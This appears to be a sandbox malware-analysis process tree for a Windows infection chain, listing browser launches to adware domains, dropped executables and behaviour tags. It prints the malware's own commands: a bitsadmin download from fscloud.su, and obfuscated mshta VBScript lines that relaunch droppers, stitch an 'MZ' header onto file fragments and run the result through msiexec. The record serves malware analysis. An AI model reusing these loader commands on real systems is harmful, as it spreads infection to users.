C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5612 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311910⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵
-
C:\Users\Admin\AppData\Local\Temp\62-2b675-62a-be9aa-575251396fa54\Ridowyshuba.exe"C:\Users\Admin\AppData\Local\Temp\62-2b675-62a-be9aa-575251396fa54\Ridowyshuba.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exeC:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe /qn CAMPAIGN="654"11⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mp1ykvmv.yzq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636985251 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exeC:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe"C:\Users\Admin\AppData\Local\Temp\yf3vlioj.fi1\any.exe" -u12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exe /S & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\lcdvcjoi.swh\autosubplayer.exe /S11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Modifies registry class
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd5033.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z12⤵
- Download via BitsAdmin
-
C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe"C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe" /VERYSILENT9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13f11af06b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exeThu13f11af06b.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exeC:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13f11af06b.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13a8cbc236137c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13a8cbc236137c.exeThu13a8cbc236137c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6100 -s 17048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2952917.exe"C:\Users\Admin\AppData\Roaming\2952917.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6590434.exe"C:\Users\Admin\AppData\Roaming\6590434.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4934134.exe"C:\Users\Admin\AppData\Roaming\4934134.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\8571651.exe"C:\Users\Admin\AppData\Roaming\8571651.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\5601481.exe"C:\Users\Admin\AppData\Roaming\5601481.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1349030.exe"C:\Users\Admin\AppData\Roaming\1349030.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Roaming\1349030.exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If """" == """" for %P in ( ""C:\Users\Admin\AppData\Roaming\1349030.exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Roaming\1349030.exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "" == "" for %P in ( "C:\Users\Admin\AppData\Roaming\1349030.exe") do taskkill -F /IM "%~nxP"11⤵
-
C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If ""-p1MldDG_NCbaD4X "" == """" for %P in ( ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "-p1MldDG_NCbaD4X " == "" for %P in ( "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe") do taskkill -F /IM "%~nxP"14⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE ( creATEoBJEct ( "wscRIPT.SHEll" ). RuN ( "CMD.EXE /C ecHo | sET /P = ""MZ"" > mVDFV.Y & cOPY /B /Y MvDFV.y + ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo " , 0 , TRUE ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ecHo | sET /P = "MZ" > mVDFV.Y & cOPY /B /Y MvDFV.y+ ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "15⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>mVDFV.Y"15⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y ..\Ff7k4.sIo15⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /IM "1349030.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\4084537.exe"C:\Users\Admin\AppData\Roaming\4084537.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\6228380.exe"C:\Users\Admin\AppData\Roaming\6228380.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4257927.exe"C:\Users\Admin\AppData\Roaming\4257927.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 2928⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 1968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
